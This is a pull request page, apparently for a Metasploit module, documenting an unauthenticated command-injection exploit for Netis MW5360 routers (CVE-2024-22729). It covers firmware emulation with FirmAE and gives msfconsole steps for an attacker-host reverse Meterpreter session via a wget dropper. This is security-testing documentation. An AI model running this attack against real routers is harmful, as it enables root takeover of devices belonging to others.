Netis MW5360 unauthenticated RCE [CVE-2024-22729] #19188
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
Netis router MW5360 has a command injection vulnerability via the password parameter on the login page.
The vulnerability stems from improper handling of the
password
parameter within the router's web interface.The router's login page authorization can be bypassed by simply deleting the authorization header, leading to the vulnerability. All router firmware versions up to
V1.0.1.3442
are vulnerable.Attackers can inject a command in the
password
parameter, encoded in base64, to exploit the command injection vulnerability. When exploited, this can lead to unauthorized command execution, potentially allowing the attacker to take full control of the router as userroot
.The following Netis network products are vulnerable:
This module has been tested via FirmAE running on Kali Linux 2024.5 at the following emulated targets:
Installation steps to emulate the router firmware with FirmAE
FirmAE
on your Linux distribution using the installation instructions provided here.binwalk
might need to be able to handle a sasquatch filesystem which requires a bit of additional installation and compilation steps that you can find here. Please do not forget to run this after yourFirmAE
installation otherwise you will not be able to extract the firmware.MW5360-1.0.1.3442.bin
for the demonstration../init.sh
to initialize and start the Postgress database../run.sh -d Netis /root/FirmAE/firmwares/Netis_MW5360-1.0.1.3442.bin
ping
the emulated router and runnmap
to check the portsYou are now ready to test the module using the emulated router hardware on IP address 192.168.1.1.
Verification
msfconsole
use exploit/linux/http/netis_unauth_rce_cve_2024_22729
set rhosts <ip-target>
set lhost <ip-attacker>
set target <0=Linux Dropper>
exploit
you should get a
Meterpreter
session.Scenarios
Netis MW5360 Router Emulation Linux Dropper - linux/mipsle/meterpreter_reverse_tcp
Limitations
Staged payloads might core dump on the target, so use stage-less payloads when using the Linux Dropper target.
Another limitation is that the router has a very limited command set that can be leveraged, so the only option is to use the
wget
command to drop an executable on the target to get a session. Chained command lines using;
do not work, so each command need to be executed in a separate request with delay of 30 seconds of more to avoid session locking (see theCMD_DELAY
option).Last but not least, be mindful that the admin router password gets overwritten by the exploit, resulting in a clear indicator of comprise.